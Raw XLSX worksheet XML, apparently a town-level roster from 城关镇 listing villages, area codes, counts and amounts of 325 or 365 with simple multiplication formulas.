      <c r="C2" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="3" customHeight="1" spans="2:3">
      <c r="B3" t="s">
        <v>2</v>
      </c>
      <c r="C3" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="4" customHeight="1" spans="2:3">
      <c r="B4" t="s">
        <v>2</v>
      </c>
      <c r="C4" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="5" customHeight="1" spans="2:3">
      <c r="B5" t="s">
        <v>2</v>
      </c>
      <c r="C5" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="2:3">
      <c r="B6" t="s">
        <v>2</v>
      </c>
      <c r="C6" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" customHeight="1" spans="2:3">
      <c r="B7" t="s">
        <v>2</v>
      </c>
      <c r="C7" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:3">
      <c r="B8" t="s">
        <v>2</v>
      </c>
      <c r="C8" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:3">
      <c r="B9" t="s">
        <v>2</v>
      </c>
      <c r="C9" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="2:3">
      <c r="B10" t="s">
        <v>2</v>
      </c>
      <c r="C10" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="2:3">
      <c r="B11" t="s">
        <v>2</v>
      </c>
      <c r="C11" t="s">
        <v>12</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="2:3">
      <c r="B12" t="s">
        <v>2</v>
      </c>
      <c r="C12" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="2:3">
      <c r="B13" t="s">
        <v>14</v>
      </c>
      <c r="C13" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:3">
      <c r="B14" t="s">
        <v>16</v>
      </c>
      <c r="C14" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="2:3">
      <c r="B15" t="s">
        <v>17</v>
      </c>
      <c r="C15" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="2:3">
      <c r="B16" t="s">
        <v>19</v>
      </c>
      <c r="C16" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:3">
      <c r="B17" t="s">
        <v>20</v>
      </c>
      <c r="C17" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:3">
      <c r="B18" t="s">
        <v>22</v>
      </c>
      <c r="C18" t="s">
        <v>23</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:3">
      <c r="B19" t="s">
        <v>24</v>
      </c>
      <c r="C19" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:3">
      <c r="B20" t="s">
        <v>25</v>
      </c>
      <c r="C20" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:3">
      <c r="B21" t="s">
        <v>26</v>
      </c>
      <c r="C21" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:3">
      <c r="B22" t="s">
        <v>28</v>
      </c>
      <c r="C22" t="s">
        <v>29</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:3">
      <c r="B23" t="s">
        <v>30</v>
      </c>
      <c r="C23" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:3">
      <c r="B24" t="s">
        <v>32</v>
      </c>
      <c r="C24" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:3">
      <c r="B25" t="s">
        <v>34</v>
      </c>
      <c r="C25" t="s">
        <v>35</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:3">
      <c r="B26" t="s">
        <v>36</v>
      </c>
      <c r="C26" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:3">
      <c r="B27" t="s">
        <v>38</v>
      </c>
      <c r="C27" t="s">
        <v>39</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:3">
      <c r="B28" t="s">
        <v>40</v>
      </c>
      <c r="C28" t="s">
        <v>41</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="2:3">
      <c r="B29" t="s">
        <v>42</v>
      </c>
      <c r="C29" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="2:3">
      <c r="B30" t="s">
        <v>44</v>
      </c>
      <c r="C30" t="s">
        <v>45</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="2:3">
      <c r="B31" t="s">
        <v>46</v>
      </c>
      <c r="C31" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="2:3">
      <c r="B32" t="s">
        <v>48</v>
      </c>
      <c r="C32" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="2:3">
      <c r="B33" t="s">
        <v>50</v>
      </c>
      <c r="C33" t="s">
        <v>51</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="2:3">
      <c r="B34" t="s">
        <v>52</v>
      </c>
      <c r="C34" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="2:3">
      <c r="B35" t="s">
        <v>54</v>
      </c>
      <c r="C35" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="2:3">
      <c r="B36" t="s">
        <v>55</v>
      </c>
      <c r="C36" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="2:3">
      <c r="B37" t="s">
        <v>57</v>
      </c>
      <c r="C37" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="2:3">
      <c r="B38" t="s">
        <v>59</v>
      </c>
      <c r="C38" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="2:3">
      <c r="B39" t="s">
        <v>61</v>
      </c>
      <c r="C39" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="2:3">
      <c r="B40" t="s">
        <v>63</v>
      </c>
      <c r="C40" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="2:3">
      <c r="B41" t="s">
        <v>65</v>
      </c>
      <c r="C41" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="2:3">
      <c r="B42" t="s">
        <v>67</v>
      </c>
      <c r="C42" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="2:3">
      <c r="B43" t="s">
        <v>69</v>
      </c>
      <c r="C43" t="s">
        <v>70</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="2:3">
      <c r="B44" t="s">
        <v>71</v>
      </c>
      <c r="C44" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="2:3">
      <c r="B45" t="s">
        <v>73</v>
      </c>
      <c r="C45" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="2:3">
      <c r="B46" t="s">
        <v>75</v>
      </c>
      <c r="C46" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="2:3">
      <c r="B47" t="s">
        <v>77</v>
      </c>
      <c r="C47" t="s">
        <v>78</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="2:3">
      <c r="B48" t="s">
        <v>79</v>
      </c>
      <c r="C48" t="s">
        <v>80</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="2:3">
      <c r="B49" t="s">
        <v>81</v>
      </c>
      <c r="C49" t="s">
        <v>82</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="2:3">
      <c r="B50" t="s">
        <v>83</v>
      </c>
      <c r="C50" t="s">
        <v>84</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="2:3">
      <c r="B51" t="s">
        <v>85</v>
      </c>
      <c r="C51" t="s">
        <v>86</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="2:3">
      <c r="B52" t="s">
        <v>87</v>
      </c>
      <c r="C52" t="s">
        <v>88</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="2:3">
      <c r="B53" t="s">
        <v>89</v>
      </c>
      <c r="C53" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="2:3">
      <c r="B54" t="s">
        <v>91</v>
      </c>
      <c r="C54" t="s">
        <v>92</v>
      </c>
    </row>
    <row r="55" customHeight="1" spans="2:3">
      <c r="B55" t="s">
        <v>93</v>
      </c>
      <c r="C55" t="s">
        <v>94</v>
      </c>
    </row>
    <row r="56" customHeight="1" spans="2:3">
      <c r="B56" t="s">
        <v>95</v>
      </c>
      <c r="C56" t="s">
        <v>96</v>
      </c>
    </row>
    <row r="57" customHeight="1" spans="2:3">
      <c r="B57" t="s">
        <v>97</v>
      </c>
      <c r="C57" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="58" customHeight="1" spans="2:3">
      <c r="B58" t="s">
        <v>99</v>
      </c>
      <c r="C58" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="59" customHeight="1" spans="2:3">
      <c r="B59" t="s">
        <v>101</v>
      </c>
      <c r="C59" t="s">
        <v>102</v>
      </c>
    </row>
    <row r="60" customHeight="1" spans="2:3">
      <c r="B60" t="s">
        <v>103</v>
      </c>
      <c r="C60" t="s">
        <v>104</v>
      </c>
    </row>
    <row r="61" customHeight="1" spans="2:3">
      <c r="B61" t="s">
        <v>105</v>
      </c>
      <c r="C61" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="62" customHeight="1" spans="2:3">
      <c r="B62" t="s">
        <v>107</v>
      </c>
      <c r="C62" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="63" customHeight="1" spans="2:3">
      <c r="B63" t="s">
        <v>109</v>
      </c>
      <c r="C63" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="64" customHeight="1" spans="2:3">
      <c r="B64" t="s">
        <v>111</v>
      </c>
      <c r="C64" t="s">
        <v>112</v>
      </c>
    </row>
    <row r="65" customHeight="1" spans="2:3">
      <c r="B65" t="s">
        <v>113</v>
      </c>
      <c r="C65" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="66" customHeight="1" spans="2:3">
      <c r="B66" t="s">
        <v>115</v>
      </c>
      <c r="C66" t="s">
        <v>116</v>
      </c>
    </row>
    <row r="67" customHeight="1" spans="2:3">
      <c r="B67" t="s">
        <v>117</v>
      </c>
      <c r="C67" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="68" customHeight="1" spans="2:3">
      <c r="B68" t="s">
        <v>118</v>
      </c>
      <c r="C68" t="s">
        <v>119</v>
      </c>
    </row>
    <row r="69" customHeight="1" spans="2:3">
      <c r="B69" t="s">
        <v>120</v>
      </c>
      <c r="C69" t="s">
        <v>121</v>
      </c>
    </row>
    <row r="70" customHeight="1" spans="2:3">
      <c r="B70" t="s">
        <v>122</v>
      </c>
      <c r="C70" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="71" customHeight="1" spans="2:3">
      <c r="B71" t="s">
        <v>124</v>
      </c>
      <c r="C71" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="72" customHeight="1" spans="2:3">
      <c r="B72" t="s">
        <v>126</v>
      </c>
      <c r="C72" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="73" customHeight="1" spans="2:3">
      <c r="B73" t="s">
        <v>128</v>
      </c>
      <c r="C73" t="s">
        <v>129</v>
      </c>
    </row>
    <row r="74" customHeight="1" spans="2:3">
      <c r="B74" t="s">
        <v>130</v>
      </c>
      <c r="C74" t="s">
        <v>131</v>
      </c>
    </row>
    <row r="75" customHeight="1" spans="2:3">
      <c r="B75" t="s">
        <v>132</v>
      </c>
      <c r="C75" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" spans="2:3">
      <c r="B76" t="s">
        <v>134</v>
      </c>
      <c r="C76" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="77" customHeight="1" spans="2:3">
      <c r="B77" t="s">
        <v>136</v>
      </c>
      <c r="C77" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="78" customHeight="1" spans="2:3">
      <c r="B78" t="s">
        <v>138</v>
      </c>
      <c r="C78" t="s">
        <v>98</v>
      </c>
    </row>
    <row r="79" customHeight="1" spans="2:3">
      <c r="B79" t="s">
        <v>139</v>
      </c>
      <c r="C79" t="s">
        <v>100</v>
      </c>
    </row>
    <row r="80" customHeight="1" spans="2:3">
      <c r="B80" t="s">
        <v>140</v>
      </c>
      <c r="C80" t="s">
        <v>141</v>
      </c>
    </row>
    <row r="81" customHeight="1" spans="2:3">
      <c r="B81" t="s">
        <v>142</v>
      </c>
      <c r="C81" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="82" customHeight="1" spans="2:3">
      <c r="B82" t="s">
        <v>144</v>
      </c>
      <c r="C82" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="83" customHeight="1" spans="2:3">
      <c r="B83" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="84" customHeight="1" spans="2:3">
      <c r="B84" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="85" customHeight="1" spans="2:3">
      <c r="B85" t="s">
        <v>148</v>
      </c>
    </row>
    <row r="86" customHeight="1" spans="2:3">
      <c r="B86" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="87" customHeight="1" spans="2:3">
      <c r="B87" t="s">
        <v>150</v>
      </c>
    </row>
    <row r="88" customHeight="1" spans="2:3">
      <c r="B88" t="s">
        <v>151</v>
      </c>
    </row>
    <row r="89" customHeight="1" spans="2:3">
      <c r="B89" t="s">
        <v>152</v>
      </c>
    </row>
    <row r="90" customHeight="1" spans="2:3">
      <c r="B90" t="s">
        <v>153</v>
      </c>
    </row>
    <row r="91" customHeight="1" spans="2:3">
      <c r="B91" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="92" customHeight="1" spans="2:3">
      <c r="B92" t="s">
        <v>155</v>
      </c>
    </row>
    <row r="93" customHeight="1" spans="2:3">
      <c r="B93" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="94" customHeight="1" spans="2:3">
      <c r="B94" t="s">
        <v>157</v>
      </c>
    </row>
    <row r="95" customHeight="1" spans="2:3">
      <c r="B95" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="96" customHeight="1" spans="2:3">
      <c r="B96" t="s">
        <v>159</v>
      </c>
    </row>
    <row r="97" customHeight="1" spans="2:2">
      <c r="B97" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="98" customHeight="1" spans="2:2">
      <c r="B98" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="99" customHeight="1" spans="2:2">
      <c r="B99" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="100" customHeight="1" spans="2:2">
      <c r="B100" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="101" customHeight="1" spans="2:2">
      <c r="B101" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="102" customHeight="1" spans="2:2">
      <c r="B102" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="103" customHeight="1" spans="2:2">
      <c r="B103" t="s">
        <v>166</v>
      </c>
    </row>
    <row r="104" customHeight="1" spans="2:2">
      <c r="B104" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="105" customHeight="1" spans="2:2">
      <c r="B105" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="106" customHeight="1" spans="2:2">
      <c r="B106" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="107" customHeight="1" spans="2:2">
      <c r="B107" t="s">
        <v>170</v>
      </c>
    </row>
    <row r="108" customHeight="1" spans="2:2">
      <c r="B108" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="109" customHeight="1" spans="2:2">
      <c r="B109" t="s">
        <v>172</v>
      </c>
    </row>
    <row r="110" customHeight="1" spans="2:2">
      <c r="B110" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="111" customHeight="1" spans="2:2">
      <c r="B111" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="112" customHeight="1" spans="2:2">
      <c r="B112" t="s">
        <v>175</v>
      </c>
    </row>
    <row r="113" customHeight="1" spans="2:2">
      <c r="B113" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="114" customHeight="1" spans="2:2">
      <c r="B114" t="s">
        <v>177</v>
      </c>
    </row>
    <row r="115" customHeight="1" spans="2:2">
      <c r="B115" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="116" customHeight="1" spans="2:2">
      <c r="B116" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="117" customHeight="1" spans="2:2">
      <c r="B117" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="118" customHeight="1" spans="2:2">
      <c r="B118" t="s">
        <v>181</v>
      </c>
    </row>
    <row r="119" customHeight="1" spans="2:2">
      <c r="B119" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="120" customHeight="1" spans="2:2">
      <c r="B120" t="s">
        <v>183</v>
      </c>
    </row>
    <row r="121" customHeight="1" spans="2:2">
      <c r="B121" t="s">
        <v>184</v>
      </c>
    </row>
    <row r="122" customHeight="1" spans="2:2">
      <c r="B122" t="s">
        <v>185</v>
      </c>
    </row>
    <row r="123" customHeight="1" spans="2:2">
      <c r="B123" t="s">
        <v>186</v>
      </c>
    </row>
    <row r="124" customHeight="1" spans="2:2">
      <c r="B124" t="s">
        <v>187</v>
      </c>
    </row>
    <row r="125" customHeight="1" spans="2:2">
      <c r="B125" t="s">
        <v>188</v>
      </c>
    </row>
    <row r="126" customHeight="1" spans="2:2">
      <c r="B126" t="s">
        <v>189</v>
      </c>
    </row>
    <row r="127" customHeight="1" spans="2:2">
      <c r="B127" t="s">
        <v>190</v>
      </c>
    </row>
    <row r="128" customHeight="1" spans="2:2">
      <c r="B128" t="s">
        <v>191</v>
      </c>
    </row>
    <row r="129" customHeight="1" spans="2:2">
      <c r="B129" t="s">
        <v>192</v>
      </c>
    </row>
    <row r="130" customHeight="1" spans="2:2">
      <c r="B130" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="131" customHeight="1" spans="2:2">
      <c r="B131" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="132" customHeight="1" spans="2:2">
      <c r="B132" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="133" customHeight="1" spans="2:2">
      <c r="B133" t="s">
        <v>196</v>
      </c>
    </row>
    <row r="134" customHeight="1" spans="2:2">
      <c r="B134" t="s">
        <v>197</v>
      </c>
    </row>
    <row r="135" customHeight="1" spans="2:2">
      <c r="B135" t="s">
        <v>198</v>
      </c>
    </row>
    <row r="136" customHeight="1" spans="2:2">
      <c r="B136" t="s">
        <v>199</v>
      </c>
    </row>
    <row r="137" customHeight="1" spans="2:2">
      <c r="B137" t="s">
        <v>200</v>
      </c>
    </row>
    <row r="138" customHeight="1" spans="2:2">
      <c r="B138" t="s">
        <v>201</v>
      </c>
    </row>
    <row r="139" customHeight="1" spans="2:2">
      <c r="B139" t="s">
        <v>202</v>
      </c>
    </row>
    <row r="140" customHeight="1" spans="2:2">
      <c r="B140" t="s">
        <v>203</v>
      </c>
    </row>
    <row r="141" customHeight="1" spans="2:2">
      <c r="B141" t="s">
        <v>204</v>
      </c>
    </row>
    <row r="142" customHeight="1" spans="2:2">
      <c r="B142" t="s">
        <v>205</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" firstPageNumber="4294963191" orientation="portrait" useFirstPageNumber="1"/>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sheetPr>
  <dimension ref="A1:XEH2657"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane xSplit="11" ySplit="4" topLeftCell="L5" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="S5" sqref="S5"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="24" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="5.625" style="11" customWidth="1"/>
    <col min="2" max="2" width="9.5" style="6" customWidth="1"/>
    <col min="3" max="3" width="15" style="6" customWidth="1"/>
    <col min="4" max="4" width="9.75" style="6" customWidth="1"/>
    <col min="5" max="5" width="19.5" style="12" customWidth="1"/>
    <col min="6" max="6" width="14.25" style="12" customWidth="1"/>
    <col min="7" max="8" width="6.625" style="8" customWidth="1"/>
    <col min="9" max="9" width="7.125" style="8" customWidth="1"/>
    <col min="10" max="10" width="12.625" style="12" customWidth="1"/>
    <col min="11" max="11" width="18.875" style="13" customWidth="1"/>
    <col min="12" max="16362" width="9" style="6"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="1:11 16351:16362">
      <c r="A1" s="14" t="s">
        <v>206</v>
      </c>
      <c r="B1" s="14"/>
      <c r="C1" s="14"/>
      <c r="D1" s="14"/>
      <c r="E1" s="14"/>
      <c r="F1" s="14"/>
      <c r="G1" s="14"/>
      <c r="H1" s="14"/>
      <c r="I1" s="15"/>
      <c r="J1" s="14"/>
      <c r="K1" s="14"/>
    </row>
    <row r="2" ht="27" customHeight="1" spans="1:11 16351:16362">
      <c r="A2" s="16" t="s">
        <v>207</v>
      </c>
      <c r="B2" s="17" t="s">
        <v>208</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D2" s="17" t="s">
        <v>210</v>
      </c>
      <c r="E2" s="17" t="s">
        <v>211</v>
      </c>
      <c r="F2" s="17" t="s">
        <v>212</v>
      </c>
      <c r="G2" s="17" t="s">
        <v>213</v>
      </c>
      <c r="H2" s="17" t="s">
        <v>214</v>
      </c>
      <c r="I2" s="17" t="s">
        <v>215</v>
      </c>
      <c r="J2" s="17" t="s">
        <v>216</v>
      </c>
      <c r="K2" s="17" t="s">
        <v>217</v>
      </c>
      <c r="XDW2"/>
      <c r="XDX2"/>
      <c r="XDY2"/>
      <c r="XDZ2"/>
      <c r="XEA2"/>
      <c r="XEB2"/>
      <c r="XEC2"/>
      <c r="XED2"/>
      <c r="XEE2"/>
      <c r="XEF2"/>
      <c r="XEG2"/>
      <c r="XEH2"/>
    </row>
    <row r="3" customHeight="1" spans="1:11 16351:16362">
      <c r="A3" s="16" t="s">
        <v>218</v>
      </c>
      <c r="B3" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C3" s="17" t="s">
        <v>220</v>
      </c>
      <c r="D3" s="17" t="s">
        <v>221</v>
      </c>
      <c r="E3" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F3" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G3" s="17">
        <v>2</v>
      </c>
      <c r="H3" s="18">
        <v>325</v>
      </c>
      <c r="I3" s="17">
        <f>H3*G3</f>
        <v>650</v>
      </c>
      <c r="J3" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K3" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="4" customHeight="1" spans="1:11 16351:16362">
      <c r="A4" s="16" t="s">
        <v>226</v>
      </c>
      <c r="B4" s="17" t="str">
        <f>B3</f>
        <v>城关镇</v>
      </c>
      <c r="C4" s="17" t="str">
        <f>C3</f>
        <v>东北六组</v>
      </c>
      <c r="D4" s="16" t="s">
        <v>227</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>228</v>
      </c>
      <c r="F4" s="17" t="str">
        <f>F3</f>
        <v>4113210103</v>
      </c>
      <c r="G4" s="17"/>
      <c r="H4" s="17"/>
      <c r="I4" s="17"/>
      <c r="J4" s="17"/>
      <c r="K4" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="5" customHeight="1" spans="1:11 16351:16362">
      <c r="A5" s="16" t="s">
        <v>229</v>
      </c>
      <c r="B5" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C5" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D5" s="17" t="s">
        <v>231</v>
      </c>
      <c r="E5" s="17" t="s">
        <v>232</v>
      </c>
      <c r="F5" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G5" s="17">
        <v>2</v>
      </c>
      <c r="H5" s="18">
        <v>325</v>
      </c>
      <c r="I5" s="17">
        <f>H5*G5</f>
        <v>650</v>
      </c>
      <c r="J5" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K5" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="1:11 16351:16362">
      <c r="A6" s="16" t="s">
        <v>234</v>
      </c>
      <c r="B6" s="17" t="str">
        <f>B5</f>
        <v>城关镇</v>
      </c>
      <c r="C6" s="17" t="str">
        <f>C5</f>
        <v>中华村</v>
      </c>
      <c r="D6" s="16" t="s">
        <v>235</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>236</v>
      </c>
      <c r="F6" s="17" t="str">
        <f>F5</f>
        <v>4113210108</v>
      </c>
      <c r="G6" s="17"/>
      <c r="H6" s="17"/>
      <c r="I6" s="17"/>
      <c r="J6" s="17"/>
      <c r="K6" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="7" customHeight="1" spans="1:11 16351:16362">
      <c r="A7" s="16" t="s">
        <v>237</v>
      </c>
      <c r="B7" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C7" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D7" s="17" t="s">
        <v>238</v>
      </c>
      <c r="E7" s="17" t="s">
        <v>239</v>
      </c>
      <c r="F7" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G7" s="17">
        <v>1</v>
      </c>
      <c r="H7" s="18">
        <v>365</v>
      </c>
      <c r="I7" s="17">
        <f>H7*G7</f>
        <v>365</v>
      </c>
      <c r="J7" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K7" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="1:11 16351:16362">
      <c r="A8" s="16" t="s">
        <v>240</v>
      </c>
      <c r="B8" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D8" s="17" t="s">
        <v>241</v>
      </c>
      <c r="E8" s="17" t="s">
        <v>242</v>
      </c>
      <c r="F8" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G8" s="17">
        <v>2</v>
      </c>
      <c r="H8" s="18">
        <v>325</v>
      </c>
      <c r="I8" s="17">
        <f>H8*G8</f>
        <v>650</v>
      </c>
      <c r="J8" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K8" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="1:11 16351:16362">
      <c r="A9" s="16" t="s">
        <v>243</v>
      </c>
      <c r="B9" s="17" t="str">
        <f>B8</f>
        <v>城关镇</v>
      </c>
      <c r="C9" s="17" t="str">
        <f>C8</f>
        <v>中华村</v>
      </c>
      <c r="D9" s="16" t="s">
        <v>244</v>
      </c>
      <c r="E9" s="16" t="s">
        <v>245</v>
      </c>
      <c r="F9" s="17" t="str">
        <f>F8</f>
        <v>4113210108</v>
      </c>
      <c r="G9" s="17"/>
      <c r="H9" s="17"/>
      <c r="I9" s="17"/>
      <c r="J9" s="17"/>
      <c r="K9" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="1:11 16351:16362">
      <c r="A10" s="16" t="s">
        <v>246</v>
      </c>
      <c r="B10" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>247</v>
      </c>
      <c r="D10" s="17" t="s">
        <v>248</v>
      </c>
      <c r="E10" s="17" t="s">
        <v>249</v>
      </c>
      <c r="F10" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G10" s="17">
        <v>2</v>
      </c>
      <c r="H10" s="18">
        <v>325</v>
      </c>
      <c r="I10" s="17">
        <f>H10*G10</f>
        <v>650</v>
      </c>
      <c r="J10" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K10" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="1:11 16351:16362">
      <c r="A11" s="16" t="s">
        <v>250</v>
      </c>
      <c r="B11" s="17" t="str">
        <f>B10</f>
        <v>城关镇</v>
      </c>
      <c r="C11" s="17" t="str">
        <f>C10</f>
        <v>东北四组</v>
      </c>
      <c r="D11" s="16" t="s">
        <v>251</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>252</v>
      </c>
      <c r="F11" s="17" t="str">
        <f>F10</f>
        <v>4113210103</v>
      </c>
      <c r="G11" s="17"/>
      <c r="H11" s="17"/>
      <c r="I11" s="17"/>
      <c r="J11" s="17"/>
      <c r="K11" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="1:11 16351:16362">
      <c r="A12" s="16" t="s">
        <v>253</v>
      </c>
      <c r="B12" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D12" s="17" t="s">
        <v>254</v>
      </c>
      <c r="E12" s="17" t="s">
        <v>255</v>
      </c>
      <c r="F12" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G12" s="17">
        <v>1</v>
      </c>
      <c r="H12" s="18">
        <v>365</v>
      </c>
      <c r="I12" s="17">
        <f>H12*G12</f>
        <v>365</v>
      </c>
      <c r="J12" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K12" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="1:11 16351:16362">
      <c r="A13" s="16" t="s">
        <v>256</v>
      </c>
      <c r="B13" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C13" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D13" s="17" t="s">
